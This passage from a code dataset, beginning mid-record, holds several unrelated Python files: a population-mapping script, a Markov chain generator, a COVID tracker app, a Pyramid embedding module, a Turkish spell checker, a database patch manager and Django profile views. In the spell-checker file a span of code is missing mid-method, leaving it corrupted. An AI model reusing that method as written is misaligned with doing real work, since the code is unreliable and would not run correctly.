result[i,j] < val:\n\n index_x = (index+0.0000001)/len(x)\n break\n for index, val in enumerate(y):\n if night_point_matrix[i,j] < val:\n index_y = (index+0.0000001)/len(y)\n break\n result[i,j] = x[int(len(x)*(index_y*0.5+index_x*0.5))]\n\n\n # spatial filtering\n result = conv(result, gau(3), county_matrix, 0)\n\n\n weight_matrix = normalize(result,county_matrix,county_dict)\n pop_matrix = calCountyPop(weight_matrix,county_matrix,county_dict)\n pop_dict = {}\n [rows, cols] = pop_matrix.shape\n for i in range(rows):\n for j in range(cols):\n if (np.isnan(county_matrix[i, j])):\n pass\n else:\n if (county_matrix[i, j] in pop_dict):\n\n pop_dict[county_matrix[i, j]].append(pop_matrix[i,j])\n else:\n pop_dict[county_matrix[i, j]] = []\n\n MAE, RMSE ,r2= calSubError(pop_matrix,sub_matrix,sub_dict)\n print(\"MAE :\" + str(MAE))\n print(\"RMSE :\" + str(RMSE))\n print(\"r2 :\" + str(r2))\n\n","repo_name":"ZPGuiGroupWhu/PopulationSpatialization","sub_path":"Code/populationSpatialization.py","file_name":"populationSpatialization.py","file_ext":"py","file_size_in_byte":6481,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"20991798314","text":"import random\n\n\nclass Markov_Chain(object):\n\n # storage stores \"word\": {\"word\": frequency}\n table = {}\n\n def choose_random_key(self, dictionary):\n # choose word based on probility weight\n random_int = random.uniform(0, 1)\n total_word_count = sum(dictionary.values())\n cumulative_prob = 0.0\n if len(dictionary) == 0:\n return None\n for key, val in dictionary.items():\n cumulative_prob += (val / total_word_count)\n if random_int < cumulative_prob:\n break\n return key\n\n def random_walk(self, word_count):\n string = \"\"\n prev_key = None\n for i in range(word_count):\n if prev_key is not None:\n next_key = self.choose_random_key(self.table[prev_key])\n # print(\"===> Prev_key: {}\".format(prev_key))\n # print(\"===> Next_key: {}\".format(next_key))\n if next_key is None:\n return string\n split_key = next_key.split()\n string += split_key[1] + \" \"\n prev_key = next_key\n else:\n keys = list(self.table)\n random_key = random.choice(keys)\n string += random_key + \" \"\n prev_key = random_key\n return string.capitalize()\n\n def build_chain(self, list_of_words):\n for word in list_of_words:\n self.table[word] = {}\n prev_word = None\n prev_prev_word = None\n for word in list_of_words:\n if prev_word and prev_prev_word is None:\n prev_word = word\n elif prev_prev_word is None and prev_word is not None:\n prev_prev_word = prev_word\n prev_word = word\n elif prev_word and prev_prev_word is not None:\n try:\n key = prev_prev_word + \" \" + prev_word\n self.table[key][word] += 1\n except:\n key = prev_prev_word + \" \" + prev_word\n new_key = prev_word + \" \" + word\n self.table[key] = {new_key: 1}\n try:\n prev_prev_word = prev_word\n prev_word = word\n except:\n prev_word = word\n\nif __name__ == \"__main__\":\n markov_chain = Markov_Chain()\n sample_list = [\n \"A\", \"man,\", \"a\", \"plan,\", \"a\",\n \"canal:\", \"Panama!\", \"A\", \"dog,\",\n \"a\", \"panic\", \"in\", \"a\", \"pagoda!\"\n ]\n markov_chain.build_chain(sample_list)\n string = markov_chain.random_walk(8)\n print(string)\n","repo_name":"MakeSchool-17/twitter-bot-python-beingadrian","sub_path":"10_flask/markov_2.py","file_name":"markov_2.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"656452794","text":"# 
Library imports\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom plotly.offline import iplot\nimport plotly.graph_objs as go\nimport plotly.express as px\nfrom pandas.io.json import json_normalize\nfrom streamlit.script_runner import StopException, RerunException\n\n\nfig = go.Figure()\n\nst.write(\"\"\"\n # Covid 19 Tracking App 🚑\n \"\"\")\nst.write(\"\"\"\n This is a web app build by CIT Group 6 Cohort 2, that tracks the covid 19 cases in the world.\n \"\"\")\n\nurl = 'https://api.covid19api.com/countries'\nr = requests.get(url)\ndf0 = json_normalize(r.json())\n\ntop_row = pd.DataFrame(\n {'Country': ['Select a Country'], 'Slug': ['Empty'], 'ISO2': ['E']}\n)\n\n# Concatenate with the old frame and reset the Index\ndf0 = pd.concat([top_row, df0]).reset_index(drop=True)\n\nst.sidebar.header('Create/Filter search')\ngraph_type = st.sidebar.selectbox(\n 'Cases type', ('confirmed', 'deaths', 'recovered'))\nst.sidebar.subheader('Search by country')\ncountryX = st.sidebar.selectbox('Country', df0.Country)\ncountryY = st.sidebar.selectbox('Compare with another country', df0.Country)\n\nif st.sidebar.button('Refresh Data'):\n raise RerunException(st.ScriptRequestQueue.RerunData(None))\n\nif countryX != 'Select a Country':\n slug = df0.Slug[df0['Country'] == countryX].to_string(index=False)[1:]\n url = 'https://api.covid19api.com/total/dayone/country/'+slug+'/status/'+graph_type\n r = requests.get(url)\n st.write(\"\"\"# Total \"\"\" + graph_type + \"\"\" cases in \"\"\" +\n countryX + \"\"\" are: \"\"\"+str(r.json()[-1].get(\"Cases\")))\n df = json_normalize(r.json())\n layout = go.Layout(\n title=countryX + '\\'s ' + graph_type + ' cases Data',\n xaxis=dict(title='Date'),\n yaxis=dict(title='Number of cases'),)\n\n fig.update_layout(dict1=layout, overwrite=True)\n fig.add_trace(go.Scatter(x=df.Date, y=df.Cases,\n mode='lines', name=countryX))\n\n if countryY != 'Select a Country':\n slug1 = df0.Slug[df0['Country'] == countryY].to_string(index=False)[1:]\n url = 'https://api.covid19api.com/total/dayone/country/'+slug1+'/status/'+graph_type\n r = requests.get(url)\n st.write(\"\"\"# Total \"\"\" + graph_type + \"\"\" cases in \"\"\" + countryY + \"\"\"are : \"\"\" +\n str(r.json()[-1].get(\"Cases\")))\n\n df = json_normalize(r.json())\n\n layout = go.Layout(\n title=countryX + ' vs ' + countryY+' ' + graph_type + ' cases Data',\n xaxis=dict(title='Date'),\n yaxis=dict(title='Number of cases'),\n )\n fig.update_layout(dict1=layout, overwrite=True)\n fig.add_trace(go.Scatter(x=df.Date, y=df.Cases,\n mode='lines', name=countryY))\n\n st.plotly_chart(fig, use_container_width=True)\n\n\nelse:\n url = 'https://api.covid19api.com/world/total'\n r = requests.get(url)\n total = r.json()['TotalConfirmed']\n deaths = r.json()['TotalDeaths']\n recovered = r.json()['TotalRecovered']\n st.write(\"\"\"\n # WordlWide Data:\n \"\"\")\n st.write(\"Total cases: \"+str(total)+\", Total deaths: \" +\n str(deaths)+\", Total recovered: \"+str(recovered))\n x = [\"TotalCases\", \"TotalDeaths\", \"TotalRecovered\"]\n y = [total, deaths, recovered]\n\n layout = go.Layout(\n title='World Data',\n xaxis=dict(title=\"Category\"),\n yaxis=dict(title=\"Number of cases\"),\n )\n\n fig.update_layout(dict1=layout, overwrite=True)\n fig.add_trace(go.Bar(name='World Data', x=x, y=y))\n st.plotly_chart(fig, 
use_container_width=True)\n","repo_name":"okellodaniel/Covid-Tracker","sub_path":"Covid_19_Tracker.py","file_name":"Covid_19_Tracker.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"38402532791","text":"from copy import deepcopy\nfrom .cache import ManagerLRUCache\nfrom past.builtins import basestring\nfrom posixpath import join\nfrom pyramid.compat import (\n native_,\n unquote_bytes_to_wsgi,\n)\nfrom pyramid.httpexceptions import HTTPNotFound\nimport logging\nlog = logging.getLogger(__name__)\n\n\ndef includeme(config):\n config.scan(__name__)\n config.add_renderer('null_renderer', NullRenderer)\n config.add_request_method(embed, 'embed')\n config.add_request_method(lambda request: set(), '_embedded_uuids', reify=True)\n config.add_request_method(lambda request: set(), '_linked_uuids', reify=True)\n config.add_request_method(lambda request: None, '__parent__', reify=True)\n\n\ndef make_subrequest(request, path):\n \"\"\" Make a subrequest\n\n Copies request environ data for authentication.\n\n May be better to just pull out the resource through traversal and manually\n perform security checks.\n \"\"\"\n env = request.environ.copy()\n if path and '?' in path:\n path_info, query_string = path.split('?', 1)\n path_info = path_info\n else:\n path_info = path\n query_string = ''\n env['PATH_INFO'] = path_info\n env['QUERY_STRING'] = query_string\n subreq = request.__class__(env, method='GET', content_type=None,\n body=b'')\n subreq.remove_conditional_headers()\n # XXX \"This does not remove headers like If-Match\"\n subreq.__parent__ = request\n return subreq\n\n\nembed_cache = ManagerLRUCache('embed_cache')\n\n\ndef embed(request, *elements, **kw):\n \"\"\" as_user=True for current user\n \"\"\"\n # Should really be more careful about what gets included instead.\n # Cache cut response time from ~800ms to ~420ms.\n as_user = kw.get('as_user')\n path = join(*elements)\n path = unquote_bytes_to_wsgi(native_(path))\n log.debug('embed: %s', path)\n if as_user is not None:\n result, embedded, linked = _embed(request, path, as_user)\n else:\n cached = embed_cache.get(path, None)\n if cached is None:\n cached = _embed(request, path)\n embed_cache[path] = cached\n result, embedded, linked = cached\n result = deepcopy(result)\n request._embedded_uuids.update(embedded)\n request._linked_uuids.update(linked)\n return result\n\n\ndef _embed(request, path, as_user='EMBED'):\n subreq = make_subrequest(request, path)\n subreq.override_renderer = 'null_renderer'\n if as_user is not True:\n if 'HTTP_COOKIE' in subreq.environ:\n del subreq.environ['HTTP_COOKIE']\n subreq.remote_user = as_user\n try:\n result = request.invoke_subrequest(subreq)\n except HTTPNotFound:\n raise KeyError(path)\n return result, subreq._embedded_uuids, subreq._linked_uuids\n\n\ndef expand_path(request, obj, path):\n if isinstance(path, basestring):\n path = path.split('.')\n if not path:\n return\n name = path[0]\n remaining = path[1:]\n value = obj.get(name, None)\n if value is None:\n return\n if isinstance(value, list):\n for index, member in enumerate(value):\n if not isinstance(member, dict):\n member = value[index] = request.embed(member, '@@object')\n expand_path(request, member, remaining)\n else:\n if not isinstance(value, dict):\n value = obj[name] = request.embed(value, '@@object')\n expand_path(request, value, remaining)\n\n\nclass NullRenderer:\n '''Sets result value directly as response.\n '''\n def __init__(self, 
info):\n pass\n\n def __call__(self, value, system):\n request = system.get('request')\n if request is None:\n return value\n request.response = value\n return None\n","repo_name":"ClinGen/clincoded","sub_path":"src/contentbase/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":3729,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"54"} +{"seq_id":"37230370795","text":"import re\nimport locale\nimport Corpus\nimport listeler\nfrom NGram.NGram import NGram\nfrom Dictionary.Word import Word\nfrom Corpus.Sentence import Sentence\nfrom NGram.NoSmoothing import NoSmoothing\nfrom SpellChecker.NGramSpellChecker import NGramSpellChecker\nfrom SpellChecker.SimpleSpellChecker import SimpleSpellChecker\nfrom SpellChecker.TrieBasedSpellChecker import TrieBasedSpellChecker\nfrom SpellChecker.SpellCheckerParameter import SpellCheckerParameter\nfrom MorphologicalAnalysis.FsmMorphologicalAnalyzer import FsmMorphologicalAnalyzer\n\n\nclass turkish_denet:\n nGram = NGram('../data/ngram.txt')\n def __init__(self, text=\"\"):\n self.fsm = FsmMorphologicalAnalyzer()\n self.parameter = SpellCheckerParameter()\n self.nGram = NGram(\"../data/ngram.txt\")\n self.text = text\n self.searchfile = open(\"../data/VERB_TS_Corpus_Frequency_List.txt\", \"r\", encoding=\"utf8\")\n self.nGram.calculateNGramProbabilitiesSimple(NoSmoothing())\n self.trieSpellChecker = TrieBasedSpellChecker(self.fsm, self.nGram, self.parameter)\n self.nGramSpellChecker = NGramSpellChecker(self.fsm, self.nGram, self.parameter)\n self.turkcekelime = []\n\n\n\n def kisaltmakontrol(self,text):\n kisaltList = listeler.kisaltList\n uzunhaller = listeler.uzunhaller\n words = text.split()\n for i in range(len(words)):\n if words[i] in kisaltList:\n index = kisaltList.index(words[i])\n words[i] = uzunhaller[index]\n result = \" \".join(words)\n result = \" \".join(result.split())\n return text\n\n def kelimekontrol(self, text):\n kelimeler = set(self.turkcekelime)\n generated_words = set()\n misspellings = {}\n context_list = []\n turkish_word = set()\n\n\n with open(\"../data/generated_words.txt\", \"r\", encoding=\"utf-8\") as file:\n for line in file:\n generated_words.add(line.strip())\n\n\n with open(\"../data/turkish_dictionary.txt\", \"r\", encoding=\"utf-8\") as file:\n for line in file:\n self.turkcekelime.append(line.strip())\n\n\n with open(\"../data/turkish_misspellings.txt\", \"r\", encoding=\"utf-8\") as file:\n for line in file:\n correct_word, misspelled_word = line.strip().split()\n misspellings[misspelled_word] = correct_word\n\n\n with open(\"../data/turkish_words.txt\",\"r\",encoding=\"utf-8\") as file:\n for line in file:\n turkish_word.add(line.strip())\n\n\n\n with open(\"../data/context_list.txt\", \"r\", encoding=\"utf-8\") as file:\n for line in file:\n context_list.append(line.strip())\n\n words = text.split()\n filtered_words = []\n for word in words:\n ana_kelime = word.strip(\",.!?\")\n if ana_kelime in kelimeler:\n filtered_words.append(word)\n elif ana_kelime in generated_words:\n filtered_words.append(word)\n elif ana_kelime in misspellings:\n filtered_words.append(word)\n elif ana_kelime in turkish_word:\n filtered_words.append(word)\n else:\n filtered_words.append(\"\")\n\n filtered_text = \" \".join(filtered_words)\n\n\n for context in context_list:\n if context in filtered_text:\n filtered_text = filtered_text.replace(context, \"\")\n\n\n with open(\"../data/filtered_text.txt\", \"w\", encoding=\"utf-8\") as file:\n file.write(filtered_text)\n\n 
return filtered_text\n\n def kucukHarfeDonustur(self,text):\n words = text.split()\n lowercased_words = [word.lower() for word in words]\n return \" \".join(lowercased_words)\n\n def noktalamaTemizleyicisi(self, text):\n regex = r\"(? 0:\n if i == 0:\n capitalized_word = word[0].upper() + word[1:].lower()\n elif kelimeler[i - 1].endswith((\".\", \"?\", \"!\")):\n capitalized_word = word[0].upper() + word[1:].lower()\n else:\n capitalized_word = word.lower()\n capitalized_words.append(capitalized_word)\n\n buyukharf = ' '.join(capitalized_words)\n return buyukharf\n\n\n\n\n\n\n\n\n","repo_name":"yusufbaykal/TurkceYazimDenetim","sub_path":"YazımDenetim/turkish_yaz.py","file_name":"turkish_yaz.py","file_ext":"py","file_size_in_byte":6887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22868100278","text":"def hargaMahal():\n List1=[]\n List2=[]\n for x,y in buah.items():\n print('-',x,', Harga: Rp.',y,)\n List1.append(y)\n List2.append(x)\n a=max(List1)\n b=List1.index(a)\n print('Buah yang harganya paling mahal adalah:',List2[b])\n \n\nbuah={'apel':5000,'jeruk':8500,'mangga':7800,'duku':6500}\nprint('*****DAFTAR HARGA BUAH*****')\n\nhargaMahal()\n","repo_name":"aniszahrodl/Praktikum-Chapter-08","sub_path":"LATIHAN/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"ms","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21848856581","text":"#!/usr/bin/env python3\n\"\"\"Tool for managing database, patches, and db_schema.sql file.\"\"\"\n\nimport collections\nfrom enum import Enum\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nfrom tools.db_manager import db\nfrom tools.db_manager import db_instance\nfrom tools.db_manager import file_reader\nfrom tools.db_manager import patch_reader\nfrom tools.workspace import workspace\n\n_HOME_DIR = os.path.expanduser('~')\n_WORKSPACE = workspace.get_path()\n_LINE = '--------------------------------------------------'\n\n_SqlUpgrade = collections.namedtuple(\n 'SqlUpgrade',\n ['query', 'files', 'hashes', 'followups'])\n\n_PythonUpgrade = collections.namedtuple(\n 'PythonUpgrade',\n ['script', 'files', 'hashes'])\n\n_ShellUpgrade = collections.namedtuple(\n 'ShellUpgrade',\n ['script', 'files', 'hashes'])\n\ndef _should_continue(prompt):\n cont = input('{} [y/n] '.format(prompt))\n return bool(re.match(r'[yY]', cont))\n\ndef _save_current_db_schema(schema_path):\n if not _should_continue(\n 'This will override changes to {}, continue?'.format(\n schema_path)):\n return\n with open(schema_path, 'wt', encoding='utf8') as schema_file:\n schema_file.write(db_instance.get_schema())\n\ndef _get_next_upgrade():\n upgrades = list(_get_next_batch_of_upgrades())\n if len(upgrades) == 0:\n return None\n\n # If there's only one upgrade, it may be a Python upgrade. 
Python upgrades\n # cannot be joined, so we don't have to worry about them when there are more\n # than one upgrade.\n if len(upgrades) == 1 and (\n isinstance(upgrades[0], _PythonUpgrade)\n or isinstance(upgrades[0], _ShellUpgrade)):\n return upgrades[0]\n return _combine_sql_upgrades(upgrades)\n\ndef _get_next_batch_of_upgrades():\n is_first = True\n for upgrade in _get_upgrades():\n if (not isinstance(upgrade, _SqlUpgrade)\n or _query_must_be_split(upgrade.query + ';')):\n if is_first:\n yield upgrade\n break\n yield upgrade\n is_first = False\n\ndef _get_upgrades():\n patches = patch_reader.get_unapplied_patches()\n for patch in patches:\n if patch.type == patch_reader.PatchType.SQL:\n yield _SqlUpgrade(\n patch.content, [patch.file_path], [patch.hash], [''])\n elif patch.type == patch_reader.PatchType.PYTHON:\n yield _PythonUpgrade(\n patch.file_path, [patch.file_path], [patch.hash])\n else:\n assert patch.type == patch_reader.PatchType.SHELL\n yield _ShellUpgrade(\n patch.file_path, [patch.file_path], [patch.hash])\n\ndef _combine_sql_upgrades(upgrades):\n out = []\n out_files = []\n out_hashes = []\n followups = []\n for upgrade in upgrades:\n assert isinstance(upgrade, _SqlUpgrade)\n out.append(\n _LINE + '\\n'\n + '-- Upgrades:\\n{}'.format(\n _format_file_list(upgrade.files, '-- ')))\n out.append('')\n out.append(upgrade.query.strip())\n out.append('')\n insert_hash = 'INSERT INTO db_patches (hash) VALUES {};'.format(\n _format_hashes_for_insert(upgrade.hashes))\n out.append(insert_hash)\n followups.append(insert_hash)\n out_files.extend(upgrade.files)\n out_hashes.extend(upgrade.hashes)\n if len(out) == 0:\n raise Exception('No upgrade found.')\n return _SqlUpgrade(\n '\\n'.join(out), out_files, out_hashes, followups)\n\ndef _format_hashes_for_insert(hashes):\n begin = '\\n (\\'\\\\x'\n end = '\\')'\n return begin + (end + ',' + begin).join(hashes) + end\n\ndef _get_saved_schema_content_at_commit(schema_path, commit):\n saved_schema_path = schema_path\n if saved_schema_path[0:len(_WORKSPACE)] == _WORKSPACE:\n saved_schema_path = saved_schema_path[len(_WORKSPACE) + 1:]\n return _get_file_at_commit(commit, saved_schema_path)\n\ndef _get_file_at_commit(commit, file):\n return subprocess.check_output(\n [\n 'git',\n 'show',\n '{}:{}'.format(commit, file)\n ]).decode('utf8')\n\ndef upgrade(schema_path, force=False):\n if not force and not _do_next_batch_upgrade(force):\n print('Database is already up to date.')\n else:\n while _do_next_batch_upgrade(force):\n pass\n if not force:\n _verify_saved_schema_matches_current_schema(schema_path)\n patch_reader.verify_no_invalid_hashes()\n\ndef _do_next_batch_upgrade(force=False):\n upgrade = _get_next_upgrade()\n if upgrade is None:\n return False\n\n if not force:\n print('')\n print('UPGRADE TO BE APPLIED')\n print('')\n if isinstance(upgrade, _SqlUpgrade):\n print(upgrade.query)\n else:\n assert (\n isinstance(upgrade, _PythonUpgrade)\n or isinstance(upgrade, _ShellUpgrade))\n print(upgrade.script)\n print(_LINE)\n print('')\n if not _should_continue(\n 'Apply upgrades from the following files?\\n{}'.format(\n _format_file_list(upgrade.files, ' '))):\n sys.exit(1)\n\n if isinstance(upgrade, _SqlUpgrade):\n if _query_must_be_split(upgrade.query):\n _db_query(upgrade.query, force)\n else:\n assert len(upgrade.files) == len(upgrade.followups)\n for i, file in enumerate(upgrade.files):\n _db_query_file(file, force)\n _db_query(upgrade.followups[i], force)\n elif isinstance(upgrade, _PythonUpgrade):\n _execute_python(upgrade.script)\n 
_db_query(\n 'INSERT INTO db_patches (hash) VALUES {};'.format(\n _format_hashes_for_insert(upgrade.hashes)))\n else:\n assert isinstance(upgrade, _ShellUpgrade)\n _execute_shell_script(upgrade.script)\n _db_query(\n 'INSERT INTO db_patches (hash) VALUES {};'.format(\n _format_hashes_for_insert(upgrade.hashes)))\n\n return True\n\ndef _format_file_list(files, prefix):\n relative_files = []\n if _WORKSPACE[-1] == '/':\n root = _WORKSPACE\n else:\n root = _WORKSPACE + '/'\n root_length = len(root)\n for file in files:\n assert file[0:root_length] == root\n relative_files.append('//' + file[root_length:])\n return prefix + ('\\n' + prefix).join(relative_files)\n\ndef _verify_saved_schema_matches_current_schema(schema_path):\n diff = _diff_current_schema_vs_saved_schema(schema_path)\n if diff:\n print(\n 'Warning: Current schema does not match saved schema in codebase.')\n print(diff)\n\ndef _diff_current_schema_vs_saved_schema(schema_path):\n saved_schema = file_reader.read(schema_path)\n current_schema = db_instance.get_schema()\n if _schemas_equal(current_schema, saved_schema):\n return ''\n with tempfile.NamedTemporaryFile('wt', encoding='utf8') as schema_file:\n schema_file.write(current_schema)\n schema_file.flush()\n try:\n return subprocess.check_output(\n [\n 'git',\n '--no-pager',\n 'diff',\n '--color',\n '--ignore-space-at-eol',\n schema_path,\n schema_file.name\n ]).stdout.decode('utf8')\n # `git diff` has a non-zero exit code when there is a diff, seemingly by\n # default, at least for me -- even though the docs make it sound like\n # you need to specify `--exit-code` for this behavior.\n except subprocess.CalledProcessError as err:\n return err.output.decode('utf8')\n\ndef _schemas_equal(schema_a, schema_b):\n rep = re.compile(r'\\s+')\n return rep.sub('', schema_a) == rep.sub('', schema_b)\n\ndef _query_must_be_split(query):\n return (\n re.search(r'ALTER TYPE', query, flags=re.IGNORECASE)\n and re.search(r'\\;(.|\\n)*\\;', query))\n\n# This is not comprehensive. Any string in the query which contains a semicolon\n# will break the ability to split. This is just common with functions and\n# uncommon with other queries, so this is a close approximation.\n# TODO: To adequately solve this issue we need to be able to appropriately parse\n# PostgreSQL strings or any other expressions which may contain semicolons not\n# used as a line terminator. OR we can just stop using enums, avoiding the need\n# to split queries entirely.\ndef _query_cannot_be_split(query):\n return re.search(r'CREATE (?:OR REPLACE )?FUNCTION', query)\n\ndef _db_query(query, force=False):\n if _query_must_be_split(query):\n if _query_cannot_be_split(query):\n raise Exception(\n 'Query cannot be executed due to the use of both ALTER TYPEs '\n 'and CREATE FUNCTIONs. The best path forward is probably to '\n 'apply ALTER TYPE statements manually and then try to rerun '\n 'the upgrade again without them.')\n if not force:\n if not _should_continue(\n 'Warning: This query cannot be run as a transaction. 
'\n 'Split into multiple queries?'):\n sys.exit(0)\n out = []\n for part in query.split(';'):\n result = _db_query(part)\n if result != '':\n out.append(result)\n return '\\n'.join(out)\n return db_instance.query(query)\n\ndef _db_query_file(file, force=False):\n return db_instance.query_file(file)\n\ndef _execute_python(script):\n with open(script, 'rb') as file:\n code = compile(file.read(), script, 'exec')\n exec(code, {\n '__file__': script,\n '__name__': '__main__',\n })\n\ndef _execute_shell_script(script):\n env = os.environ.copy()\n env['PATCHES_ROOT'] = patch_reader.get_patch_dir()\n subprocess.check_call([script], env=env)\n\ndef _write_file(filename, content):\n _mkdir_p(os.path.dirname(filename))\n with open(filename, 'wt', encoding='utf8') as file:\n file.write(content)\n\ndef _cp_f(source, destination):\n _mkdir_p(os.path.dirname(destination))\n shutil.copyfile(source, destination)\n\ndef _mkdir_p(path):\n sub_path = os.path.dirname(path)\n if not os.path.exists(sub_path):\n _mkdir_p(sub_path)\n if not os.path.exists(path):\n os.mkdir(path)\n\ndef _verify_db_up_to_date(schema_path):\n diff = _diff_current_schema_vs_saved_schema(schema_path)\n exit_with_failure = False\n if diff:\n print(diff)\n exit_with_failure = True\n patches = patch_reader.get_unapplied_patches()\n if len(patches) > 0:\n print('Missing patches:')\n for patch in patches:\n print(patch.file_path)\n exit_with_failure = True\n if exit_with_failure:\n sys.exit(1)\n\ndef _init(schema_path, dbname, force=False):\n if not force:\n if not _should_continue(\n 'This will initialize your local database, continue?'):\n return\n _super_db_query('CREATE DATABASE {};'.format(db.get_db_name()))\n _super_db_query('ALTER DATABASE {} OWNER TO {}'.format(\n db.get_db_name(),\n db.get_db_user()))\n db.query(\n 'CREATE TABLE db_patches ( '\n 'hash bytea PRIMARY KEY NOT NULL, '\n 'applied_time timestamp with time zone DEFAULT now() NOT NULL '\n 'CHECK (date_part(\\'timezone\\', applied_time) = 0));')\n db_instance.rewind_invalid_patches()\n upgrade(schema_path, force)\n\ndef _super_db_query(query):\n return subprocess.check_output(\n [\n 'sudo',\n '-u', 'postgres',\n 'psql',\n '-At',\n '-c', query\n ]).decode('utf8')\n\ndef _has_arg(argv, arg):\n for u in argv[1:]:\n if u == arg:\n return True\n return False\n\ndef _get_command_from_args(argv):\n for u in argv[1:]:\n if u[0:1] != '-':\n return u\n return ''\n\ndef set_patch_dir(dir):\n patch_reader.set_patch_dir(dir)\n\ndef set_config_files(files):\n db_instance.set_config_files(files)\n\ndef main(argv):\n schema_path = None\n\n for arg in sys.argv[1:]:\n matches = re.search(r'^--(db_config|patches|schema)\\=(.*)$', arg)\n if matches:\n if matches.group(1) == 'db_config':\n set_config_files(matches.group(2).split(','))\n elif matches.group(1) == 'patches':\n set_patch_dir(matches.group(2))\n elif matches.group(1) == 'schema':\n schema_path = matches.group(2)\n else:\n raise Exception('Unknown param \"{}\"'.format(matches.group(1)))\n\n command = _get_command_from_args(argv)\n force = _has_arg(argv, '-y')\n dev_mode = _has_arg(argv, '--dev_mode')\n db_instance.set_dev_mode(dev_mode)\n dev_mode_allowed = _has_arg(argv, '--WARNING__permit_data_loss')\n\n if dev_mode and not command == 'init':\n if not dev_mode_allowed:\n raise Exception(\n 'In order to use dev_mode, you must pass the parameter '\n '--WARNING__permit_data_loss.')\n db_instance.rewind_invalid_patches()\n\n if command == 'init':\n if schema_path is None:\n raise Exception('Schema path was not provided.')\n 
_init(schema_path, force)\n elif command == 'upgrade':\n if schema_path is None:\n raise Exception('Schema path was not provided.')\n upgrade(schema_path, force)\n elif command == 'show_upgrade':\n next_upgrade = _get_next_upgrade()\n if next_upgrade:\n if isinstance(next_upgrade, _SqlUpgrade):\n upgrade_contents = 'SQL: ' + upgrade.query\n elif isinstance(next_upgrade, _PythonUpgrade):\n upgrade_contents = 'Python: ' + next_upgrade.script\n else:\n assert isinstance(next_upgrade, _ShellUpgrade)\n upgrade_contents = 'Shell Script: ' + next_upgrade.script\n print(upgrade_contents)\n elif command == 'show_current_schema':\n print(db_instance.get_schema())\n elif command == 'save_current_schema':\n if schema_path is None:\n raise Exception('Schema path was not provided.')\n _save_current_db_schema(schema_path)\n elif command == 'verify':\n if schema_path is None:\n raise Exception('Schema path was not provided.')\n _verify_db_up_to_date(schema_path)\n elif command == 'database_name':\n print(db_instance.get_db_name())\n elif command == 'connect':\n db_instance.connect_repl()\n elif command == 'query':\n print(db_instance.query(sys.stdin.read()))\n elif command == 'query_file':\n print(db_instance.query_file(argv[-1]))\n else:\n raise Exception('Invalid command: {}\\n{}'.format(\n command,\n 'Expected one of: verify, upgrade, show_upgrade, '\n 'show_current_schema, save_current_schema, database_name, '\n 'connect, query, query_file'))\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"ProofOfDonut/pillsbury","sub_path":"tools/db_manager/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":15019,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"8937940717","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.translation import get_language\nfrom django.contrib.auth.models import User\nfrom rest_framework.authtoken.models import Token\nfrom tenant_configuration.decorators import tenant_configuration_required\nfrom tenant_profile.decorators import tenant_profile_required\nfrom tenant_intake.decorators import tenant_intake_required\nfrom tenant_reception.decorators import tenant_reception_required\nfrom foundation_tenant.decorators import tenant_required\nfrom foundation_tenant.forms.postaladdressform import PostalAddressForm\nfrom foundation_tenant.models.base.me import Me\nfrom foundation_tenant.models.base.countryoption import CountryOption\nfrom foundation_tenant.models.base.provinceoption import ProvinceOption\nfrom foundation_tenant.models.base.cityoption import CityOption\nfrom foundation_tenant.models.base.postaladdress import PostalAddress\n\n\n@login_required(login_url='/en/login')\n@tenant_required\n@tenant_intake_required\n@tenant_reception_required\n@tenant_profile_required\n@tenant_configuration_required\ndef profile_page(request):\n return render(request, 'tenant_profile/me/generic/view.html',{\n 'page': 'profile',\n })\n\n\n@login_required(login_url='/en/login')\n@tenant_required\n@tenant_intake_required\n@tenant_reception_required\n@tenant_profile_required\n@tenant_configuration_required\ndef profile_settings_profile_page(request):\n return render(request, 'tenant_profile/me/settings/profile/view.html',{\n 'page': 'profile'\n })\n\n\n@login_required(login_url='/en/login')\n@tenant_required\n@tenant_intake_required\n@tenant_reception_required\n@tenant_profile_required\n@tenant_configuration_required\ndef 
profile_settings_address_page(request):\n address = request.tenant_me.address\n countries = CountryOption.objects.all()\n provinces = [] if not address.country else ProvinceOption.objects.filter(country=address.country)\n return render(request, 'tenant_profile/me/settings/address/view.html',{\n 'page': 'profile',\n 'countries': countries,\n 'provinces': provinces,\n 'address': address,\n 'form': PostalAddressForm(instance=address),\n 'accepted_fields': [\n 'id_postal_code', 'id_street_number', 'id_suffix', 'id_street_name',\n 'id_suite_number', 'id_address_line_2', 'id_address_line_3',\n ]\n })\n\n\n@login_required(login_url='/en/login')\n@tenant_required\n@tenant_intake_required\n@tenant_reception_required\n@tenant_profile_required\n@tenant_configuration_required\ndef profile_settings_password_page(request):\n return render(request, 'tenant_profile/me/settings/password/view.html',{\n 'page': 'profile'\n })\n\n\n@login_required(login_url='/en/login')\n@tenant_required\n@tenant_intake_required\n@tenant_reception_required\n@tenant_profile_required\n@tenant_configuration_required\ndef profile_settings_notification_page(request):\n return render(request, 'tenant_profile/me/settings/notification/view.html',{\n 'page': 'profile'\n })\n\n\n@login_required(login_url='/en/login')\n@tenant_required\ndef locked_page(request):\n \"\"\"Function will lock the User out of our system and will require a password authentication to be let back in.\"\"\"\n request.tenant_me.is_locked=True\n request.tenant_me.save()\n return render(request, 'tenant_profile/me/locked/view.html',{\n 'page': 'profile',\n })\n\n\n@tenant_profile_required\n@tenant_required\ndef tenant_profile_is_locked_page(request):\n from django.http import 